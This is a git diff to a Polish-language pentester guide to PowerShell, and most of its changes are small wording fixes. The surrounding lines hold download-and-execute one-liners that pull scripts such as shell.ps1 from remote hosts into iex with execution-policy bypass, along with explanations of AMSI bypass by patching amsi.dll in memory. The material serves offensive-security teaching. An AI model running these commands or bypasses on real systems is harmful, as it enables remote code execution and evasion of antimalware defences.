diff --git a/src/windows-hardening/basic-powershell-for-pentesters/README.md b/src/windows-hardening/basic-powershell-for-pentesters/README.md index 1c17a93a4..b05c999be 100644 --- a/src/windows-hardening/basic-powershell-for-pentesters/README.md +++ b/src/windows-hardening/basic-powershell-for-pentesters/README.md @@ -18,7 +18,6 @@ Get-Command -Module ``` ## Pobierz i Wykonaj ```powershell -g echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3 @@ -117,7 +116,7 @@ ValueData : 0 **`amsi.dll`** jest **załadowany** do twojego procesu i ma niezbędne **eksporty** do interakcji z dowolną aplikacją. A ponieważ jest załadowany do przestrzeni pamięci procesu, który **kontrolujesz**, możesz zmienić jego zachowanie, **nadpisując instrukcje w pamięci**. Sprawia to, że nie wykrywa niczego. -Dlatego celem ominięcia AMSI, które będziesz stosować, jest **nadpisanie instrukcji tego DLL w pamięci, aby uczynić wykrywanie bezużytecznym**. +Dlatego celem ominięcia AMSI, które będziesz używać, jest **nadpisanie instrukcji tego DLL w pamięci, aby uczynić wykrywanie bezużytecznym**. **Generator ominięcia AMSI** strona internetowa: [**https://amsi.fail/**](https://amsi.fail/) ```powershell @@ -181,7 +180,7 @@ Kroki wykonujące hooking wywołań API metod .NET to: ### AMSI Bypass 3 - Uprawnienia SeDebug -[**Postępując zgodnie z tym przewodnikiem i kodem**](https://github.com/MzHmO/DebugAmsi) możesz zobaczyć, jak z wystarczającymi uprawnieniami do debugowania procesów możesz uruchomić proces powershell.exe, debugować go, monitorować, kiedy ładuje `amsi.dll` i wyłączyć go. +[**Postępując zgodnie z tym przewodnikiem i kodem**](https://github.com/MzHmO/DebugAmsi), możesz zobaczyć, jak z wystarczającymi uprawnieniami do debugowania procesów możesz uruchomić proces powershell.exe, debugować go, monitorować, kiedy ładuje `amsi.dll` i wyłączyć go. ### AMSI Bypass - Więcej zasobów @@ -206,7 +205,7 @@ Opcje: `CreationTime`, `CreationTimeUtc`, `LastAccessTime`, `LastAccessTimeUtc`, ```powershell Get-Acl -Path "C:\Program Files\Vuln Services" | fl ``` -## Wersja systemu operacyjnego i poprawki hotfix +## Wersja systemu operacyjnego i poprawki HotFix ```powershell [System.Environment]::OSVersion.Version #Current OS version Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches @@ -227,6 +226,8 @@ $shell = New-Object -com shell.application $rb = $shell.Namespace(10) $rb.Items() ``` +[https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/](https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/) + ## Rekonesansja domeny {{#ref}}